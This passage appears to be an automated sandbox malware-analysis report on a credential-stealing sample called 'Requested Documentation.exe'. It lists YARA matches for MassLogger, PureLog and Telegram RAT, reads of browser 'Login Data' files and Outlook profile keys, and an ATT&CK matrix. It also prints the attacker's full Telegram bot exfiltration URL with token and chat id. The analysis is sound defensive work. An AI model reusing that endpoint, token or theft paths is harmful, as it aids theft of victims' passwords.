                  Source: C:\Users\user\Desktop\Requested Documentation.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Requested Documentation.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009D7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_009D7CAF
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009D874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_009D874B
                  Source: Requested Documentation.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: Requested Documentation.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009A862B cpuid 0_2_009A862B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,1_2_00417A20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009B4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_009B4E87
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009C1E06 GetUserNameW,0_2_009C1E06
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009B3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_009B3F3A
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009849A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009849A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4066458.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db1ade.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db0bf6.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.408e590.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db0bf6.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4065570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4065570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.56c0000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6344, type: MEMORYSTR
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4066458.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db1ade.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db0bf6.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.408e590.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db0bf6.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4065570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4065570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.56c0000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4066458.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db1ade.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db0bf6.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.408e590.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db0bf6.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4065570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4065570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.56c0000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6344, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Requested Documentation.exeBinary or memory string: WIN_81
                  Source: Requested Documentation.exeBinary or memory string: WIN_XP
                  Source: Requested Documentation.exeBinary or memory string: WIN_XPe
                  Source: Requested Documentation.exeBinary or memory string: WIN_VISTA
                  Source: Requested Documentation.exeBinary or memory string: WIN_7
                  Source: Requested Documentation.exeBinary or memory string: WIN_8
                  Source: Requested Documentation.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4066458.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db1ade.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db0bf6.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.408e590.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db0bf6.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4065570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4065570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.56c0000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6344, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4066458.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db1ade.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db0bf6.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.408e590.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db0bf6.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4065570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4065570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.56c0000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6344, type: MEMORYSTR
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4066458.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db1ade.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db0bf6.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.408e590.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db0bf6.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4065570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4065570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.56c0000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4066458.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db1ade.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db0bf6.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680ee8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.408e590.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.2db0bf6.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4065570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.4065570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.5680000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.56c0000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6344, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009F6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_009F6283
                  Source: C:\Users\user\Desktop\Requested Documentation.exeCode function: 0_2_009F6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_009F6747

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts                  		12
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/Job2
                  Valid Accounts                  		1
                  DLL Side-Loading                  		11
                  Deobfuscate/Decode Files or Information                  		121
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		2
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                  Valid Accounts                  		3
                  Obfuscated Files or Information                  		Security Account Manager1
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation                  		1
                  Software Packing                  		NTDS137
                  System Information Discovery                  		Distributed Component Object Model121
                  Input Capture                  		3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection                  		1
                  DLL Side-Loading                  		LSA Secrets241
                  Security Software Discovery                  		SSH3
                  Clipboard Data                  		14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Valid Accounts                  		Cached Domain Credentials11
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Virtualization/Sandbox Evasion                  		DCSync2
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation                  		Proc Filesystem11
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Requested Documentation.exe46%VirustotalBrowse
                  Requested Documentation.exe58%ReversingLabsWin32.Trojan.Nymeria
                  Requested Documentation.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		188.114.96.3
                  		truefalse
                    		high
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high
                      checkip.dyndns.com
                      		132.226.247.73
                      		truefalse
                        		high
                        checkip.dyndns.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://checkip.dyndns.org/false
                            		high
                            https://reallyfreegeoip.org/xml/8.46.123.189false
                              		high
                              https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189false
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://api.telegram.orgRegSvcs.exe, 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.telegram.org/botRegSvcs.exe, 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839RegSvcs.exe, 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://checkip.dyndns.org/qRegSvcs.exe, 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmpfalse
                                        		high
                                        http://reallyfreegeoip.orgRegSvcs.exe, 00000001.00000002.4194140589.000000000316D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://reallyfreegeoip.orgRegSvcs.exe, 00000001.00000002.4194140589.000000000314C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://checkip.dyndns.orgRegSvcs.exe, 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4194140589.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4194140589.0000000003140000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://checkip.dyndns.comRegSvcs.exe, 00000001.00000002.4194140589.000000000314C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://api.telegram.orgRegSvcs.exe, 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
